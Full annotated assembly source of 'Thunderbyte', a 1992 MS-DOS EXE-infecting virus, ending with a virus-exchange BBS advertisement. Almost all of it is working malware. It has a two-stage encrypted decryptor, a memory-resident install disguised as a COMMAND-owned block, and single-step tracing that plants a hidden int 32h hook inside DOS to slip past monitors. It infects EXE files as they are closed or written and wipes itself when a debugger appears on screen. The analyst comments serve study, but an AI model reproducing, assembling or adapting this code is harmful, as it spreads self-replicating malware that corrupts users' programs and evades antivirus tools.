- ;*****************************************************************************;
- ; ;
- ; Thunderbyte Virus (MS-DOS EXE infector; spelled "Tunderbyte" in the original header) ;
- ; ;
- ; TBSCAN.DAT : DB3F00807609??4D75F9 ;
- ; (Thunderbyte scanner signature. Note: Decrypt1 emits 0BDh as its first byte, so ;
- ; the leading "DB" reads like a transposition of "BD", and the 3Fh second byte is ;
- ; StartEncrypt-Decrypt2, which may belong to a different build of this listing.) ;
- ; ;
- ;*****************************************************************************;
-
- ; ----------------------------------------------------------------------------
- ; MASM/TASM-style source of a 16-bit MS-DOS EXE infector (see the label
- ; comments below). Retained for analysis only: the hand-encoded decryptor
- ; bytes, the `ret imm` stack tricks and every paragraph count depend on the
- ; exact size and order of the instructions, so nothing here may be reordered
- ; or re-encoded. One code segment with org 0: every `offset` is relative to
- ; VirusStart.
- ; ----------------------------------------------------------------------------
- virus segment public 'code'
- assume cs:virus, ds:virus, es:virus
- org 0
-
- VirusStart equ $
- VirusSize1 equ (VirusEnd1-$) ; bytes appended to a host file (code, strings, saved host header fields)
- VirusSize2 equ (VirusEnd2-$) ; bytes kept resident: VirusSize1 plus the scratch variables after VirusEnd1
-
- ; --- Stage-1 decryptor, hand-encoded so the key byte at Decrypt1[6] can be
- ; --- patched (Main: EncryptZero) and read back (Init, CloseFile). Decodes as:
- ;   BD lo 00     mov  bp,StartEncrypt-Decrypt2   ; byte count of the stage-1 region
- ;   80 76 09 kk  xor  byte ptr [bp+9],kk         ; SS-relative; Decrypt2 is at offset 10,
- ;                                                ;  so bp=N..1 covers Decrypt2..StartEncrypt-1
- ;   4D           dec  bp
- ;   75 F9        jnz  -7                         ; back to the xor
- ; Relies on SS == CS, which the infector arranges (ExeSS = ExeCS in CloseFile).
- Decrypt1: db 0bdh,StartEncrypt-Decrypt2,0
- db 80h,76h,Decrypt2-VirusStart-1,0
- db 4dh,75h,-7
- ; --- Stage-2 decryptor. Decrypt2..StartEncrypt-1 (this code) was only XORed
- ; --- with the key byte; StartEncrypt..VirusEnd1 is XORed word-wise with a
- ; --- running key. Control flow is driven entirely by `ret imm` against the
- ; --- four-word table below: sp is pointed at the `dw Init` slot and each
- ; --- `ret` pops the next routine, then moves sp up or down the table.
- Decrypt2: cli
- mov sp,offset DoAgain-2 ; sp -> `dw Init`
- ret -8 ; jump to Init; sp -> `dw DecryptWord`
-
- db 0,0,0,0,'***** THUNDERBYTE *****',0,0,0,0
-
- ; Init: cx = words to decrypt, dx = key (key byte duplicated into dh:dl),
- ; si = first encrypted word. Falls into NotReady.
- Init: mov cx,(VirusEnd1-StartEncrypt+1)/2
- mov dl,byte ptr cs:Decrypt1[6]
- mov dh,dl
- mov si,offset StartEncrypt
- NotReady: ret 2 ; pop DecryptWord; sp -> `dw NextWord`
-
- ; One word: read the still-encrypted word (SS == CS), decrypt in place, then
- ; advance the key by twice the encrypted word (NextWord runs twice per word
- ; through the ret chain) and si by 2. Inverse of the Again2 loop in CloseFile.
- DecryptWord: mov ax,ss:[si]
- xor cs:[si],dx
- NextWord: add dx,ax
- inc si
- ret -4 ; 1st pass: pop NextWord, sp -> `dw DoAgain`; 2nd pass: pop DoAgain, sp -> `dw DecryptWord`
-
- dw DecryptWord ; return-address table that serves as the stack for the chain above
- dw DoAgain
- dw NextWord
- dw Init
- DoAgain: loop NotReady ; more words: back through NotReady; done: fall into Main
-
- StartEncrypt equ $
-
- ; ============================================================================
- ; Main: entry point of the decrypted image (and of a first-generation run).
- ; Checks for a resident copy, otherwise installs one in a self-owned DOS
- ; memory block, hooks INT 8, and single-steps the DOS INT 21h dispatcher to
- ; plant an `int 32h` hook inside it (see Trace1/Trace2/Trace3). Execution
- ; falls straight off the end of this block into Trace1.
- ; ============================================================================
- Main: mov sp,1000h ; stage 2 left sp inside the decryptor table
- sti
- push ds ; PSP segment, restored at Exit
- push es
- mov ax,03031h ; "are you there?": a resident copy answers ax=0DEADh (DosVersion)
- mov bx,0DEADh
- int 21h
- cmp ax,0DEADh
- jne Install
- jmp Exit
- Install: push es
- mov ah,52h ; es:bx -> DOS list of lists
- int 21h
- mov ax,es:[bx-2] ; word in front of it: segment of the first MCB
- mov cs:FirstMCB,ax
- pop es
- ; Walk the MCB chain looking for a block whose owner is itself, whose size is
- ; exactly what we need and whose first VirusSize2 bytes all hold one value.
- ; That is what a previous copy looks like after DebugWatch wiped it with
- ; `rep stosb`, so this appears to reuse the old allocation instead of a new one.
- CheckBlock: mov ds,ax ; ds = MCB, ax = segment of its data
- inc ax
- cmp word ptr ds:[1],ax ; MCB owner field == the block itself?
- jne NextBlock
- cmp word ptr ds:[3],((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h) ; size in paragraphs
- jne NextBlock
- push ax
- push es
- mov cx,VirusSize2
- xor di,di
- mov es,ax
- mov al,es:[di] ; compare every byte with the first one
- cld
- repe scasb
- pop es
- pop ax
- je CopyVirus ; uniform -> reuse it
- NextBlock: add ax,ds:[3] ; next MCB = this data segment + size
- cmp byte ptr ds:[0],'Z' ; 'Z' marks the last block in the chain
- jne CheckBlock
- mov ah,4ah ; resize own block to -1: fails, and DOS reports the largest size in bx
- mov bx,-1
- int 21h
- mov ah,4ah ; shrink own block so the new one fits
- sub bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)+1
- int 21h
- mov ah,48h ; allocate the resident block (incl. room for CloseFile's work copy); ax = segment
- mov bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)
- int 21h
- ; ax = segment of the block to use. Dress its MCB up as a COMMAND-owned block:
- ; owner = the block itself, name field (offset 8, DOS 4+) = 'COMMAND '.
- CopyVirus: push cs
- pop ds
- dec ax ; es = the MCB in front of the block
- mov es,ax
- inc ax
- mov es:[1],ax
- mov cx,8
- mov si,offset CommandStr
- mov di,cx
- cld
- rep movsb
- mov es,ax
- EncryptZero: inc byte ptr ds:Decrypt1[6] ; new key for this session's infections; 0 would leave data in clear
- jz EncryptZero
- mov cx,VirusSize2 ; copy the whole image (variables included) into the block
- xor si,si
- xor di,di
- cld
- rep movsb
- push es ; far "return" into the copy: cs := es, ip := the instruction after the call
- call ReturnFar
- ; From here on we execute inside the resident copy.
- xor ax,ax
- mov ds,ax ; ds = interrupt vector table
- cli
- mov ax,offset DebugWatch ; INT 8 (timer) -> DebugWatch; old vector patched into its final far jmp
- xchg ax,ds:[20h]
- mov cs:OldInt8o,ax
- mov ax,cs
- xchg ax,ds:[22h]
- mov cs:OldInt8s,ax
- sti
- push ds:[4] ; keep the INT 1 vector on the stack (restored at Return4)
- push ds:[6]
- mov word ptr ds:[4],offset Trace1 ; INT 1 -> Trace1 for the single-step tracing
- mov word ptr ds:[6],cs
- pushf ; frame the DOS handler's own iret will return through: -> Return4
- push cs
- mov ax,offset Return4
- push ax
- cli
- pushf ; frame for entering the current INT 21h handler with TF (100h) set
- pop ax
- or ax,100h
- push ax
- push ds:[86h] ; INT 21h vector segment
- push ds:[84h] ; INT 21h vector offset
- mov ah,52h ; harmless request to trace (get list of lists)
- ; No jump here: Trace1 runs inline once with [bp+4] = the INT 21h vector
- ; segment, and its iret is what enters the handler in single-step mode.
- ; ============================================================================
- ; INT 1 (single-step) handlers used while tracing the DOS INT 21h dispatcher.
- ; Goal: find, below the first MCB (inside DOS, past any resident monitors
- ; hooked into the vector chain), the first jmp/call executed at the entry
- ; stack depth, and replace its first two bytes with `int 32h`. INT 21h is then
- ; filtered from HackJump/HackCall without the INT 21h vector ever changing.
- ; Frame after `push bp`: [bp+2]=ip, [bp+4]=cs, [bp+6]=flags of the traced
- ; instruction; [bp-2]=ax. Trace1 is also executed inline from Main, where
- ; [bp+4] is the INT 21h vector segment and the final iret enters the handler.
- ; ============================================================================
- Trace1: push bp
- mov bp,sp
- push ax
- push ds
- push cs
- pop ds
- mov ax,FirstMCB
- cmp [bp+4],ax ; still at/above the first MCB (application memory)? keep stepping
- jae Return1
- mov ax,[bp-2] ; remember ax and the stack depth at which DOS was reached
- mov RegAX,ax
- mov RegSP,bp
- mov ax,[bp+2] ; this cs:ip becomes the address the Dos routine calls directly
- mov OldInt21o,ax
- mov ax,[bp+4]
- mov OldInt21s,ax
- xor ax,ax
- mov ds,ax
- mov word ptr ds:[4],offset Trace2 ; further steps go to Trace2
- mov word ptr ds:[6],cs
- jmp short Trace3
- Return1: jmp short Return3
- ; Trace2: only instructions executed with the same ax and the same sp as at
- ; entry are candidates for the hook; everything else is stepped over.
- Trace2: push bp
- mov bp,sp
- push ax
- push ds
- cmp ax,cs:RegAX
- jne Return3
- cmp bp,cs:RegSP
- jne Return3
- ; Trace3: ds:bx = traced instruction; al = opcode, dx = word after it, plus 1.
- Trace3: push bx
- push dx
- lds bx,[bp+2]
- mov al,[bx]
- mov dx,[bx+1]
- inc dx
- cmp al,0e9h ; jmp rel16: Displacement = rel16+1 (hook resumes at opcode+2, target is opcode+3+rel16)
- je JumpOpcode
- cmp al,0e8h ; call rel16: same arithmetic
- je CallOpcode
- xchg ax,dx ; otherwise treat the next byte as rel8: undo the +1 and sign-extend al
- dec ax
- cbw
- xchg ax,dx
- cmp al,0ebh ; jmp short
- je JumpOpcode
- cmp al,70h ; Jcc short (70h..7Fh)
- jb Return2
- cmp al,7fh
- ja Return2
- JumpOpcode: push ax ; INT 32h (vector at 0:0C8h) -> HackJump
- push ds
- xor ax,ax
- mov ds,ax
- mov word ptr ds:[0c8h],offset HackJump
- mov word ptr ds:[0cah],cs
- jmp short Continue
- CallOpcode: push ax ; INT 32h -> HackCall
- push ds
- xor ax,ax
- mov ds,ax
- mov word ptr ds:[0c8h],offset HackCall
- mov word ptr ds:[0cah],cs
- Continue: pop ds
- pop ax
- mov cs:Displacement,dx ; used by HackJump/HackCall to emulate the replaced instruction
- mov cs:Opcode,al ; HackJump executes this opcode to decide whether a Jcc is taken
- mov ax,32cdh ; overwrite the first two bytes with CD 32 (`int 32h`), keeping the originals
- xchg ax,[bx]
- mov cs:SavedCode,ax
- mov cs:HackOffset,bx
- mov cs:HackSegment,ds
- and word ptr [bp+6],0feffh ; clear TF: tracing is over, DOS continues normally
- Return2: pop dx
- pop bx
- Return3: pop ds
- pop ax
- pop bp
- iret
- ; Return4: reached through the frame Main pushed, once the traced INT 21h/52h
- ; request has returned. ds is expected to still be 0 (set in Main; the trace
- ; handlers restore the ds they saved).
- Return4: pop ds:[6] ; restore the original INT 1 vector
- pop ds:[4]
- mov cs:Handle,0
- ; Exit: hand control to the host. OldIP/OldCS/OldSS/OldSP hold the host's
- ; header values (CloseFile); the defaults (ip 0, cs -10h, sp 1000h) make a
- ; first-generation run jump to PSP:0 (conventionally `int 20h`) instead.
- Exit: pop es
- pop ds ; PSP
- mov ax,ds
- add ax,10h ; load segment = PSP + 10h paragraphs
- add cs:OldCS,ax ; relocate the host's CS
- add ax,cs:OldSP ; NOTE(review): SS is formed from OldSP rather than OldSS; a host
- mov dx,cs:OldSP ;  whose SS != SP would get a wrong stack segment (bug or transcription error?)
- cli
- mov ss,ax
- mov sp,dx
- sti
- jmp cs:OldEntry ; far jump to OldCS:OldIP
-
- ReturnFar: retf ; used by Main: with a segment pushed before the `call`, this resumes
-                 ; at the caller's next instruction inside that segment
-
- ; Host entry point and stack, in the order `jmp far` expects (IP then CS).
- ; The OldCS/OldSP defaults serve a first-generation run (see Exit).
- OldEntry equ this dword
- OldIP dw 0
- OldCS dw -10h
- OldSP dw 1000h
- OldSS dw 0
-
- ; Where the `int 32h` was planted inside DOS, and the two bytes it replaced.
- ; Like everything up to VirusEnd1 these are part of the image written into
- ; hosts, so a file sample carries the infecting machine's values.
- HackAddress equ this dword
- HackOffset dw ?
- HackSegment dw ?
- SavedCode dw ?
-
- ; INT 32h handler when the hooked DOS instruction was a jmp/Jcc. Runs the
- ; INT 21h filter, then emulates the original jump. Frame after the two
- ; pushes: [bp+4]=ip (hooked address+2), [bp+6]=cs, [bp+8]=flags of the DOS code.
- HackJump: call Interrupt21
- push bp ; simulate a conditional or
- push ax ; unconditional jump
- mov bp,sp
- mov ax,[bp+8] ; DOS's flags with IF and TF cleared ...
- and ax,0fcffh
- push ax
- db 0b8h ; mov ax,????
- Displacement dw 0 ; ... ax = displacement (patched by Trace3) ...
- popf ; ... so the Jcc below sees DOS's condition flags
- Opcode db 0ebh,3,0 ; j?? +3 ; opcode byte patched by Trace3; taken -> skip the xor
- xor ax,ax ; not taken: displacement 0
- nop
- add [bp+4],ax ; adjust the resume ip
- pop ax
- pop bp
- iret ; back into DOS at the jump target (or fall-through)
-
- ; INT 32h handler when the hooked DOS instruction was a near call. Runs the
- ; filter, then rewrites the iret frame so that iret lands on the call target
- ; with the call's return address (hooked address+3) left on the stack.
- ; After `sub sp,2`/`push bp`: [bp+2]=spare slot, [bp+4]=ip, [bp+6]=cs, [bp+8]=flags.
- HackCall: call Interrupt21
- sub sp,2 ; simulate a call
- push bp
- mov bp,sp
- push ax
- mov ax,[bp+4] ; return address = ip+1 (ip is opcode+2, the call is 3 bytes)
- inc ax
- xchg ax,[bp+8] ; flags <-> return address
- xchg ax,[bp+6] ; cs <-> flags
- xchg ax,[bp+4] ; ip <-> cs ; frame is now: [target], cs, flags, return address
- add ax,cs:Displacement
- mov [bp+2],ax ; target = ip + Displacement
- pop ax
- pop bp
- iret
-
- ; Seek: al = origin (0 start, 1 current, 2 end), offset 0; returns dx:ax =
- ; resulting file position, CF on error. Clobbers cx and dx. Falls into Dos.
- Seek: mov ah,42h
- xor cx,cx
- xor dx,dx
-
- ; Dos: call DOS without going through the INT 21h vector: pushf + far call to
- ; the entry Trace1 recorded (OldInt21s:OldInt21o), whose iret returns here.
- Dos: pushf
- db 9ah ; call far OldInt21s:OldInt21o
- OldInt21o dw ?
- OldInt21s dw ?
- ret
-
- ; "Are you there?" reply: ax=3031h/bx=0DEADh is answered with ax=0DEADh and
- ; returned straight to the INT 21h caller. `add sp,8` drops the near return
- ; address of `call Interrupt21` and the 6-byte INT 32h frame; the iret then
- ; uses the caller's own INT 21h frame, which sits next on the stack because
- ; Trace2 only hooked an instruction running at the entry sp. Any other
- ; ah=30h call is passed on untouched.
- DosVersion: cmp ax,3031h
- jne NotTByte
- cmp bx,0DEADh
- jne NotTByte
- mov ax,0DEADh
- add sp,8
- iret
-
- ; INT 21h filter, entered by near call from HackJump/HackCall with the
- ; caller's registers intact. Puts the two original bytes back at HackAddress
- ; for the duration of the call, dispatches on ah (3Eh close, 40h write), and
- ; on the way out (Old21) re-plants `int 32h`. All registers are preserved.
- Interrupt21: cmp ah,30h
- je DosVersion
- push si
- push ds
- push cs:SavedCode
- lds si,cs:HackAddress
- pop ds:[si] ; restore the hooked DOS instruction while we call back into DOS
- pop ds
- pop si
- push ax
- push bx
- push cx
- push dx
- push si
- push di
- push bp
- push ds
- push es
- cmp ah,3eh
- je CloseFile
- cmp ah,40h
- je WriteFile
- Old21: pop es
- pop ds
- pop bp
- pop di
- pop si
- pop dx
- pop cx
- pop bx
- pop ax
- push si
- push ds
- lds si,cs:HackAddress
- mov word ptr ds:[si],32cdh ; re-arm the hook
- pop ds
- pop si
- NotTByte: ret
-
- ; ah=40h: capture an EXE header as it is being written (apparently to catch
- ; files being created, e.g. by a linker) into the 24-byte shadow header at
- ; Signature, keyed by handle, so CloseFile can infect without re-reading.
- ; bx=handle, cx=count, ds:dx=buffer as supplied by the caller. Every path
- ; ends at Error1 -> Old21.
- WriteFile: mov ax,4400h ; IOCTL: get device info for the handle
- call Dos
- cmp dl,7fh ; bit 7 set = character device: ignore
- ja Error1
- mov al,1 ; current position in dx:ax
- call Seek
- jc Error1
- or dx,dx ; only writes inside the first 24 bytes qualify
- jnz Error1
- cmp ax,17h
- ja Error1
- push cs
- pop es
- mov si,dx ; NOTE(review): dx was zeroed by Seek, so this is ds:0 rather than the
-           ; caller's ds:dx buffer; the "MZ" test below only works when the
-           ; buffer happens to start at offset 0
- mov di,offset Signature ; shadow header slot matching the file position
- add di,ax
- cmp word ptr [si],"ZM" ; buffer must start with "MZ"
- jne Error1
- cmp word ptr [si+12h],0DEADh ; checksum field already carries the infection marker: skip
- je Error1
- cmp cx,18h ; short write: only for the handle already being tracked
- jb CheckHandle
- or ax,ax ; full header written at offset 0: always accept
- jz Ok
- CheckHandle: cmp bx,cs:Handle
- jne Error1
- Ok: add cx,ax ; bytes to copy = min(cx, 18h - ax)
- cmp cx,18h
- jbe CountOk
- mov cx,18h
- CountOk: sub cx,ax
- jbe Error1
- cld
- rep movsb
- mov cs:Handle,bx ; remember which handle the shadow header belongs to
- Error1: jmp Old21
-
- ; ah=3Eh: infect the EXE file being closed. bx=handle. Works on the 24-byte
- ; shadow header at Signature (read here, or captured by WriteFile for the
- ; same handle). All failures fall through to Old21 via Error1/2/3.
- CloseFile: push cs
- pop ds
- push cs
- pop es
- mov ax,4400h ; skip character devices
- call Dos
- test dl,80h
- jne Error1
- or bx,bx ; handle 0 is read; the handle WriteFile tracked is not re-read
- je Read
- cmp cs:Handle,bx
- je DoNotRead
- Read: xor al,al ; seek to 0 and read the 24-byte header
- call Seek
- jc Error1
- mov ah,3fh
- mov cx,18h
- mov dx,offset Signature
- call Dos
- jc Error1
- DoNotRead: mov cs:Handle,0
- cmp Signature,"ZM" ; must be "MZ"
- jne Error1
- cmp ChkSum,0DEADh ; checksum field doubles as the infection marker
- je Error1
- mov ax,ExeIP ; keep the host's entry point and stack for Exit
- mov OldIP,ax
- mov ax,ExeCS
- mov OldCS,ax
- mov ax,ExeSS
- mov OldSS,ax
- mov ax,ExeSP
- mov OldSP,ax
- mov al,2 ; dx:ax = file size (seek to end)
- call Seek
- jc Error1
- push ax
- push dx
- mov cx,200h ; header must describe exactly this size: size mod 512 == PartPage
- div cx ;  and ceil(size/512) == PageCount (no overlay / appended data)
- cmp PartPage,dx
- jne SizeError
- add dx,-1 ; carry iff remainder != 0
- adc ax,0
- cmp PageCount,ax
- SizeError: pop dx ; pops preserve the flags of the last cmp
- pop ax
- jne Error2
- add ax,0fh ; round the size up to a paragraph and seek there
- adc dx,0
- and ax,0fff0h
- mov cx,dx
- mov dx,ax
- mov ax,4200h
- call Dos
- jnc SeekOk
- Error2: jmp Old21
- SeekOk: mov cx,10h ; paragraph index of the appended image; minus the header
- div cx ;  size gives its segment relative to the load segment
- sub ax,HdrSize
- mov ExeCS,ax ; new entry point: Decrypt1 (offset 0) in that segment
- mov ExeIP,offset Decrypt1
- mov ExeSS,ax ; SS == CS is required by both decryptors
- mov ExeSP,VirusSize1+400h
- cmp MinMem,40h ; ensure at least 40h paragraphs are loaded beyond the image
- jae MemoryOk
- mov MinMem,40h
- cmp MaxMem,40h
- jae MemoryOk
- mov MaxMem,40h
- ; Build an encrypted copy in the paragraphs right after the resident image
- ; (the block allocated in Main has room for it), then append it to the file.
- ; The key byte is the resident Decrypt1[6], set at install time.
- MemoryOk: push ds
- push es
- mov ax,cs
- mov ds,ax
- add ax,(VirusSize2+0fh)/10h ; work area: first paragraph after the resident copy
- mov es,ax
- mov cx,VirusSize1
- xor si,si
- xor di,di
- cld
- rep movsb
- mov ds,ax
- mov cx,offset StartEncrypt-Decrypt2 ; stage 1: byte XOR over Decrypt2..StartEncrypt-1
- mov dl,byte ptr ds:Decrypt1[6]
- mov si,offset StartEncrypt-1
- Again1: xor ds:[si],dl
- dec si
- loop Again1
- mov cx,(VirusEnd1-StartEncrypt+1)/2 ; stage 2: word XOR with a running key,
- mov dh,dl ;  key += 2 * encrypted word per step (inverse of DecryptWord)
- mov si,offset StartEncrypt
- Again2: xor ds:[si],dx
- mov ax,ds:[si]
- add dx,ax
- inc si
- add dx,ax
- inc si
- loop Again2
- mov ah,40h ; append VirusSize1 bytes from the work area
- mov cx,VirusSize1
- xor dx,dx
- call Dos
- pop ds
- pop es
- jc Error3
- mov al,2 ; recompute the size fields from the new file size
- call Seek
- jc Error3
- mov cx,200h
- div cx
- mov PartPage,dx
- add dx,-1
- adc ax,0
- mov PageCount,ax
- mov ChkSum,0DEADh ; infection marker
- xor al,al ; rewrite the 24-byte header; ReloCnt is left untouched
- call Seek
- jc Error3
- mov ah,40h
- mov cx,18h
- mov dx,offset Signature
- call Dos
- Error3: jmp Old21
-
- Count dw 8 ; DebugWatch only scans the screen every 8th INT 8 tick
- DebugStr db 'DEBUG' ; text that triggers the self-wipe when it appears on screen
- CommandStr db 'COMMAND ' ; 8-byte owner name written into the resident block's MCB
-
- ; INT 8 (timer) handler. Every 8th tick scans the 2000 character cells of
- ; the text screen at B000h and then B800h for "DEBUG" (case-folded with
- ; AND 0DFh, attribute bytes skipped). On a hit the resident copy removes its
- ; DOS hook, unhooks INT 8, and wipes itself with a `rep stosb` executed from
- ; a 14-byte stub it copies to 0000:04F0h (free bytes in the BIOS data area),
- ; which then chains to the old INT 8 handler.
- DebugWatch: push ax
- push cx
- push dx
- push si
- push di
- push ds
- push es
- dec cs:Count
- jnz EndWatch
- mov cs:Count,8
- mov ax,0b000h ; first pass: mono text buffer; second pass adds 800h -> B800h
- mov ds,ax
- mov cx,2
- push cs
- pop es
- cld
- NextScreen: push cx
- mov cx,2000 ; 80x25 cells, each char + attribute
- xor si,si
- mov di,offset DebugStr
- NextChar1: mov dx,5 ; characters still to match
- NextChar2: lodsb
- inc si ; skip the attribute byte
- and al,0dfh ; fold to upper case
- scasb ; compare with DebugStr[di], advance di
- jne CharOk
- dec dx
- jnz NextChar2
- ; Match. Only act if our `int 32h` is still in place at HackAddress.
- Alarm: pop cx
- lds si,cs:HackAddress
- cmp byte ptr ds:[si],0cdh
- jne EndWatch
- mov ax,cs:SavedCode ; put the original DOS bytes back
- mov ds:[si],ax
- xor cx,cx
- mov ds,cx
- mov ax,cs:OldInt8o ; restore the INT 8 vector
- mov ds:[20h],ax
- mov ax,cs:OldInt8s
- mov ds:[22h],ax
- mov es,cx
- push cs
- pop ds
- mov cx,14 ; copy `rep stosb` + the 7 pops + the far jmp (14 bytes) to 0:4F0h
- mov si,offset EndWatch-2
- mov di,4f0h
- push es ; far return address = 0:4F0h
- push di
- rep movsb
- xor di,di ; stosb operands: es:di = start of our image, cx = its size,
- mov cx,VirusSize2 ;  al = low byte of OldInt8s (the last value loaded into ax)
- push cs
- pop es
- retf ; run the stub: wipe ourselves, restore registers, jump to the old INT 8
- ; Mismatch after k compares (dx = 5-(k-1)): rewind di to DebugStr and si to
- ; the cell after the first one compared. neg leaves CF=1 (dx != 0) and
- ; add dx,5 keeps it, so sbb subtracts (5-dx)+1 = k.
- CharOk: neg dx
- add dx,5
- sbb di,dx
- sub si,dx
- sub si,dx
- loop NextChar1
- ScreenOk: mov ax,ds ; next text buffer segment
- add ax,800h
- mov ds,ax
- pop cx
- loop NextScreen
- jmp short EndWatch
- rep stosb ; never executed here; only as the head of the stub copied to 0:4F0h
- EndWatch: pop es
- pop ds
- pop di
- pop si
- pop dx
- pop cx
- pop ax
- db 0eah ; jmp far to the original INT 8 handler
- OldInt8o dw ?
- OldInt8s dw ?
-
- db '***** (C) COPYRIGHT 1992 BY THE WRITER *****'
-
- VirusEnd1 equ $ ; end of the part written into host files
-
- ; Scratch variables: resident only (beyond VirusSize1), never written to disk.
- FirstMCB dw ? ; segment of the first MCB; also the DOS/application boundary used by Trace1
- RegAX dw ? ; ax and sp at the moment the trace first reached DOS (Trace1/Trace2)
- RegSP dw ?
-
- Handle dw ? ; handle whose header WriteFile captured; 0 = none
- ; 24-byte copy of an EXE header (same layout as the file's first 18h bytes),
- ; read and written as one block starting at Signature.
- Signature dw ? ; "MZ"
- PartPage dw ? ; bytes used in the last 512-byte page
- PageCount dw ? ; number of 512-byte pages
- ReloCnt dw ? ; relocation entries (never changed by the infector)
- HdrSize dw ? ; header size in paragraphs
- MinMem dw ? ; extra paragraphs required / wanted
- MaxMem dw ?
- ExeSS dw ? ; initial SS:SP (relative to the load segment)
- ExeSP dw ?
- ChkSum dw ? ; checksum field; 0DEADh marks an infected file
- ExeIP dw ? ; initial CS:IP
- ExeCS dw ?
-
- VirusEnd2 equ $ ; end of the resident image
-
- virus ends
-
- end Main ; entry point of a first-generation build (infected hosts enter at Decrypt1)
- ;─────────────────────────────────────────────────────────────────────────;
- ;──────────────────> and Remember Don't Forget to Call <──────────────────;
- ;────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────;
- ;─────────────────────────────────────────────────────────────────────────;
-
-